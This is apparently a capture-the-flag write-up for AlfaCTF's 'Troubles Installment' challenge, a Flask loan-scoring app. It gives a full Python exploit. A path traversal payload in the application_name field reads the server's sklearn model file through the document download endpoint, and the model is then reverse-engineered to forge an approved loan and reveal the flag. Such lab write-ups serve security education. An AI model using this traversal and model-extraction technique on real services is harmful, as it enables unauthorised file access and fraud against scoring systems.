Troubles Installment

alfactf

Task: Flask credit scoring app with ML-based loan approval; ULTRA-LOW-RISK product reveals flag but requires ML model approval. Solution: path traversal in document download to extract sklearn model, reverse engineer threshold and special categorical values, craft application that passes ML scoring.

flask lfi path_traversal postgresql machine_learning sklearn random_forest credit_scoring reportlab joblib

path_traversal_via_db_fieldml_model_extractionsklearn_model_reverse_engineeringfeature_bruteforcethreshold_bypass

$ ls tags/ techniques/

flask lfi path_traversal postgresql machine_learning sklearn random_forest credit_scoring reportlab joblib

path_traversal_via_db_fieldml_model_extractionsklearn_model_reverse_engineeringfeature_bruteforcethreshold_bypass

Troubles Installment — AlfaCTF

Description

A credit scoring web application "Karabin Capital" where users can submit loan applications. The goal is to get an approved "ULTRA-LOW-RISK" loan which reveals the flag.

The application is a Flask web service with PostgreSQL backend. Users register, submit loan applications with personal and financial data, and receive approval decisions. Applications with amount <= 10000 are auto-approved as MICRO-CASH. Larger amounts go through an ML scoring model (sklearn RandomForestClassifier). The ULTRA-LOW-RISK product requires amount >= 500000 AND ML model approval (probability >= threshold), and reveals the flag upon approval.

Analysis

Application Architecture

Flask web application with PostgreSQL database
ReportLab for PDF document generation
sklearn RandomForestClassifier for credit scoring
Two-tier approval logic:
- amount <= 10000: auto-approved as MICRO-CASH
- amount > 10000: requires ML model scoring

Vulnerability Discovery

The vulnerability is in the download_document function (app.py lines 820-864):

@app.get("/api/applications/<application_id>/document")
def download_document(application_id: str) -> Response:
    ...
    base_dir = STORAGE_ROOT / user["public_uuid"] / user["login"]
    unsafe_path = base_dir / row["name"]  # row["name"] = application_name from DB
    safe_path = safe_document_path(user, row["name"])
    ...
    target_path = unsafe_path if unsafe_path.exists() else safe_path
    file_bytes = target_path.read_bytes()  # Reads arbitrary file!

The application_name field from the database is used directly in file path construction without sanitization. When creating an application, the user controls the application_name field, which gets stored in the database and later used to construct the file path for document download.

Path Traversal Calculation

Base path: /srv/karabin/data/storage/{uuid}/{login}/
Target file: /srv/karabin/secrets/karabin-ratebook (the ML model)
Traversal payload: ../../../../secrets/karabin-ratebook

Solution

Step 1: Extract the ML Model via Path Traversal

import requests

BASE_URL = 'https://capital-xxx.alfactf.ru'
session = requests.Session()

# Register a new user
session.post(f'{BASE_URL}/api/register', json={
    'login': 'attacker01',
    'password': 'password123'
})

# Create an application with path traversal in the name
# Amount <= 10000 ensures auto-approval (needed to get document_url)
application_data = {
    'application_name': '../../../../secrets/karabin-ratebook',
    'birth_date': '1990-01-01',
    'last_name': 'Test',
    'first_name': 'Test',
    'patronymic': 'Test',
    'annual_income': 100000,
    'monthly_expenses': 5000,
    'amount': 5000,  # <= 10000 for auto-approve
    'term_months': 12,
    'karabin_payroll_project': '0',
    'housing_type': 'Rented apartment',
    'occupation_type': 'IT staff',
    'education_type': 'Higher education',
    'family_status': 'Single / not married'
}

response = session.post(f'{BASE_URL}/api/applications', json=application_data)
app_id = response.json()['application']['id']

# Download the "document" - actually retrieves the ML model!
response = session.get(f'{BASE_URL}/api/applications/{app_id}/document')
# Content-Type will be application/octet-stream (not PDF)

with open('karabin-ratebook', 'wb') as f:
    f.write(response.content)

Step 2: Analyze the ML Model

import joblib
import pandas as pd

# Load the extracted model bundle
bundle = joblib.load('karabin-ratebook')
print(bundle.keys())  # ['pipeline', 'threshold', 'features']

# Critical finding: approval threshold
print(f"Threshold: {bundle['threshold']}")  # 0.93

pipeline = bundle['pipeline']
# Pipeline structure: ColumnTransformer (preprocessor) + RandomForestClassifier

# Extract categorical feature encodings
preprocessor = pipeline.steps[0][1]
cat_encoder = preprocessor.named_transformers_['categorical']

# Discovered CTF-specific categories hidden in the model:
# LAST_NAME categories include: 'Цтфный' (CTF hint!)
# FIRST_NAME categories include: 'Лев'
# PATRONYMIC categories include: 'Альфабанкович' (CTF hint!)

Key findings from model analysis:

Threshold = 0.93: Need probability >= 0.93 for ULTRA-LOW-RISK approval
CTF-specific names: The model was trained with special categorical values that give high approval probability:
- Last name: "Цтфный" (literally "CTF-like")
- First name: "Лев"
- Patronymic: "Альфабанкович" (contains "Alfa" - the CTF organizer)

Step 3: Find Winning Parameters

Bruteforce search to find parameter combination achieving probability >= 0.93:

import numpy as np
from itertools import product

# Test the CTF-specific profile
profile = {
    'LAST_NAME': 'Цтфный',
    'FIRST_NAME': 'Лев',
    'PATRONYMIC': 'Альфабанкович',
    'AGE_YEARS': 35,
    'AMT_INCOME_TOTAL': 5000000,
    'REQUESTED_AMOUNT': 1000000,
    'REQUESTED_TERM_MONTHS': 36,
    'MONTHLY_EXPENSES': 100000,
    'KARABIN_PAYROLL_PROJECT': 1,
    'NAME_HOUSING_TYPE': 'Office apartment',
    'OCCUPATION_TYPE': 'High skill tech staff',
    'NAME_EDUCATION_TYPE': 'Higher education',
    'NAME_FAMILY_STATUS': 'Married',
}

df = pd.DataFrame([profile])
proba = pipeline.predict_proba(df)[0][1]
print(f"Probability: {proba}")  # 0.9915 >= 0.93 ✓

Step 4: Submit Winning Application

# Calculate birth date for age 35
from datetime import date
birth_date = date(1991, 1, 15)  # Results in age ~35

winning_application = {
    'application_name': 'ULTRA_LOW_RISK_WIN',
    'birth_date': '1991-01-15',
    'last_name': 'Цтфный',
    'first_name': 'Лев',
    'patronymic': 'Альфабанкович',
    'annual_income': 5000000,
    'monthly_expenses': 100000,
    'amount': 1000000,  # >= 500000 for ULTRA-LOW-RISK
    'term_months': 36,
    'karabin_payroll_project': '1',
    'housing_type': 'Office apartment',
    'occupation_type': 'High skill tech staff',
    'education_type': 'Higher education',
    'family_status': 'Married'
}

response = session.post(f'{BASE_URL}/api/applications', json=winning_application)
data = response.json()['application']

print(f"Status: {data['status']}")           # approved
print(f"Product: {data['product_code']}")    # ULTRA-LOW-RISK
print(f"Flag: {data['flag']}")               # alfa{b4NK_CreDIt_ScoR3_was_5Tol3N_4ND_lo4n_w45_r3cEIV3d}